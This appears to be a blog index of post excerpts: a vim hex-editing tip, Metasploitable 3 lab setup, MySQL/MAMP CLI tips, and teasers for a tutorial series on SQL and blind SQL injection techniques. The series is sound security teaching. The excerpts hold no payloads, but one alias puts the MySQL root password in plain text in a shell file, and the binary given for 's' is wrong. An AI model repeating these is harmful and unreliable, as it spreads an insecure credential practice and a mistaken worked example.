How to use VIM as an Hex Editor

I want to display the hex format of a compiled binary from an helloworld.c program using vim.

The source code of the helloworld.c:

#include < stdio.h >
int main()
{
   // printf() displays the string inside quotation
   printf("Hello, World!");
   return 0;
}

So after you generate the binary helloworld using gcc:

gcc helloworld.c -o helloworld

You’ve to edit the executable using vim:

vim helloworld

The last step is to use the xxd command to transform the result to the hex presentation by doing :%!xxd.

How to set up Metasploitable 3 on macOS Mojave

Today we’ll set up an environment of a list of virtual machines (ubuntu and windows) that includes some intentional vulnerabilities ready to exploit using Metasploitable 3 as the target machines and Kali as an attacker, but before that, there is the list of requirements you need:

Software requirements

You can install VirtualBox, Packer and Vagrant manually from the links below, or you can use brew:

brew cask install virtualbox
brew cask install vagrant
brew install packer

System requirements

  • VT-x/AMD-V Supported Processor recommended
  • 65 GB Available space on drive
  • 4.5 GB RAM

Our environment, in the end, will have these 2 virtual machines, one running Ubuntu metasploitable3-ub1404 and one running Windows metasploitable3-win2k8.

Read More

Use ctrl + w to delete a word with MySQL Cli

By default, and while you’re using mysql CLI the combination ctrl + w delete the enter line, so if you type a long query and you want to delete the word before the cursor the combination ctrl + w will not work and you have to use the backspace instead, and the only configuration to solve this problem is by creating the file ~/.editrc if it doesn’t exist and add this line of code:

bind "^W" ed-delete-prev-word

How to access the MySQL CLI With MAMP

First, you’ve to start MAMP or MAMP PRO, and you open your terminal and type:

/Applications/MAMP/Library/bin/mysql -uroot -p

Enter the password, by default the password, is root:

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 254
Server version: 5.6.35 MySQL Community Server (GPL)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

If you want to use the command mysql by default without typing the entire command line you can edit one of these dot files ~./bashrc if you’re using bash or ~/.zshrc in case of using zsh and add this alias:

alias mysql=/Applications/MAMP/Library/bin/mysql -uroot -proot

After editing the file using Vim or Nano save the dot file, and run the source to validate the modification:

If you use zsh:

source ~/.zshrc

If you use bash:

source ~/.bashrc

Now you can run the command mysql from the terminal without typing any extra word.

Blind SQL Injection # bit-by-bit Inference

In the last example we use binary search technique to get each character of the SYSTEM_USER by infering a grouped 8-bits(1 byte) through a selected requests.

Now you’ll use another technique when you’ve to select a single bit from a selected position on each request.

If you’ve as an example the character s which have a presentation in decimal of 11310 and in binary 0110 01112, to use bit-by-bit technique you’ve to use bitwise AND against a byte that has the most significant bit at some position, if the predicate returns true the bit is 1 otherwise the bit is 0.

Let’s start the 8 requests for each significant bit set corresponding to6410, 3210, 1610, 810, 410, 210 and 110.

Read More

Blind SQL Injection # Inference Techniques

Blind SQL Injection is the kind of attack based on inference because you’ve no displayed error and no message indicating warnings, in this article, you’ll use inference techniques for a use case of getting the current MySQL username and hostname from a vulnerable code.

You’ll use the same tables and data from the previous example setup, and this is the code of the count-cars.php page:

Read More

SQL Injection VS Blind SQL Injection

So far you learn how to trigger a SQL error sending some SQL code from the client(Browser) to the server, however, sometimes the web application doesn’t show any error message from the database but doesn’t mean the code is not vulnerable, and this is why you’ve to pay attention to the detail.

A normal SQL injection is closely similar to a Blind SQL Injection, the only difference is that blind injection will not display any error message from the database server warning you that your SQL Query syntax is not correct, plus you’ve to ask true or false questions and watching the responses, in the other hand a normal SQL Injection will show a generic error message making exploiting the vulnerability less difficult.

Environment Setup

You’ll set up an environment to test both cases, so our examples will be executed on a database including two relational tables users and cars using a cardinality One-to-many(1:n) when a car can have multiple users.

Read More

SQL Injection Attacks # Intro

Welcome to this journey of understanding the concept of this famous vulnerability SQL Injection, we’ll try together to understand the basics and we’ll go step by step exploring it.

What’s a Web Application

Before going further, let’s first describe what’s a web application? A web application is an application that is accessed from a web browser, where the web browser will be the responsible for rendering the result coming from a web server.

Let’s take a simple example of this blog running under a Wordpress CMS, you’re reading this article from a web browser (Google Chrome, Firefox, Internet Explorer…) installed on your computer, the article is stored somewhere on a database server plus an HTTP Server rendering a server-side scripting language.

What I describe here is the combined parts that form a web app, the first part is the presentation of the result (a Web browser), the logic part (a server-side programming language in this case PHP), and in the end the database or the storage part (MySQL, SQL, Oracle…).

Read More

How to access to the graphcool database using CLI or PhpMyAdmin

I’ve an already mounted containers using the name of users-permissions, and this is the list of the containers:

04db65cb9ba7        graphcool/graphcool-dev:0.11.1   "/app/bin/single-ser…"   2 hours ago         Up 2 hours          0.0.0.0:60000->60000/tcp         users_permissions_graphcool_1
bab62d6ed0ec        mysql:5.7                        "docker-entrypoint.s…"   2 hours ago         Up 2 hours          3306/tcp, 33060/tcp              users_permissions_graphcool-db_1
f26d74765251        graphcool/localfaas:0.11.1       "/app/bin/localfaas"     2 hours ago         Up 2 hours          0.0.0.0:60050->60050/tcp         users_permissions_localfaas_1

As you already see the container that hold our database is using the name users_permissions_graphcool-db_1, this container is create from an mysql:5.7 server, and I’ve two solutions to access to it, one uses CLI and a second one uses Phpmyadmin.

Read More